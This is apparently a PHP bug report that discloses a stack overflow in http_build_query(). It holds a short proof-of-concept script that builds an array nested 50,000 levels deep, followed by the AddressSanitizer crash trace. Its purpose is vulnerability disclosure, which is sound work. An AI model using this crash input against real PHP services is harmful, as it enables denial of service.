Description
The following code:
// PoC: Stack overflow in http_build_query via unbounded recursion
// Builds a deeply nested array and calls http_build_query() to force deep C recursion
// Expected: AddressSanitizer/stack overflow crash or segfault
ini_set('memory_limit', '-1');
$depth = isset($argv[1]) ? (int)$argv[1] : 50000; // adjust as needed
fwrite(STDERR, "[i] Building nested array to depth {$depth}\n");
$a = null;
for ($i = 0; $i < $depth; $i++) {
$a = [$i => $a];
}
fwrite(STDERR, "[i] Starting http_build_query()...\n");
// Use a small prefix to exercise integer-index path; not required for crash
$q = http_build_query($a, 'p');
// If it somehow returns, print small confirmation
echo "len=" . strlen($q) . "\n";
Resulted in this output:
$ ./php cli.php
[i] Building nested array to depth 50000
[i] Starting http_build_query()...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==850581==ERROR: AddressSanitizer: stack-overflow on address 0x7fff75560f08 (pc 0x7986730a9080 bp 0x7fff755617a0 sp 0x7fff75560f10 T0)
#0 0x7986730a9080 in prctl ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249
#1 0x6110da2db0fe in zend_mmap_set_name /home/administrator/php/php-src/Zend/zend_mmap.h:40
#2 0x6110da2db6cc in zend_mm_mmap /home/administrator/php/php-src/Zend/zend_alloc.c:562
#3 0x6110da2dc035 in zend_mm_chunk_alloc_int /home/administrator/php/php-src/Zend/zend_alloc.c:743
#4 0x6110da2dc288 in zend_mm_chunk_alloc /home/administrator/php/php-src/Zend/zend_alloc.c:810
#5 0x6110da2dce37 in zend_mm_alloc_pages /home/administrator/php/php-src/Zend/zend_alloc.c:1051
#6 0x6110da2dd4a5 in zend_mm_alloc_large_ex /home/administrator/php/php-src/Zend/zend_alloc.c:1121
#7 0x6110da2dd58b in zend_mm_alloc_large /home/administrator/php/php-src/Zend/zend_alloc.c:1138
#8 0x6110da2df223 in zend_mm_alloc_heap /home/administrator/php/php-src/Zend/zend_alloc.c:1498
#9 0x6110da2e6016 in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2783
#10 0x6110da6d6f09 in zend_string_alloc /home/administrator/php/php-src/Zend/zend_string.h:167
#11 0x6110da6d9222 in zend_string_concat3 /home/administrator/php/php-src/Zend/zend_string.c:493
#12 0x6110d9f9dbc7 in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:180
#13 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
#14 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
#15 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
…
#245 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
#246 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249 in prctl
==850581==ABORTING
Build configuration:
$ ./configure CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address" --enable-debug
Researcher: Nikita Sveshnikov (Positive Technologies)
PHP Version
PHP 8.6.0-dev (cli) (built: Nov 18 2025 10:57:54) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies
Operating System
Ubuntu 24.04.2 LTS
Description
The following code:
Resulted in this output:
Build configuration:
Researcher: Nikita Sveshnikov (Positive Technologies)
PHP Version
Operating System
Ubuntu 24.04.2 LTS